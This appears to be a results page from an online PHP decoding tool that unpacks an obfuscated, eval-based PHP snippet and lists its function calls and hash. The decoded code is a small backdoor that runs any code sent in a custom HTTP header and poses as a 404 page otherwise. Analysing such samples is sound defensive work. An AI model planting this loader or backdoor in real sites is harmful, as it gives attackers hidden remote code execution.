Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php error_reporting(0);set_time_limit(0);eval(str_rot13(gzuncompress(base64_decode("eJxT..
Decoded Output download
$x = getenv("HTTP_DEMOLITION"); if($x) {eval($x);} else header("HTTP/1.1 404 Not Found");
Did this file decode correctly?
Original Code
<?php error_reporting(0);set_time_limit(0);eval(str_rot13(gzuncompress(base64_decode("eJxTyVawVSgpSi9KzNRQCnV3d44PDIpyigxzD3NyVNK0Vigr1lDJ1lSoLsrMqwSxrGsViirTihRKi/IKi1IhWvQN9QwVTAxMFByT0hWCkzISC4E6AaqIGh0=")))); ?>
Function Calls
| str_rot13 | 1 |
| gzuncompress | 1 |
| base64_decode | 1 |
| set_time_limit | 1 |
| error_reporting | 1 |
Stats
| MD5 | 1ad164b722242f93c0d4a5c6cb116539 |
| Eval Count | 1 |
| Decode Time | 124 ms |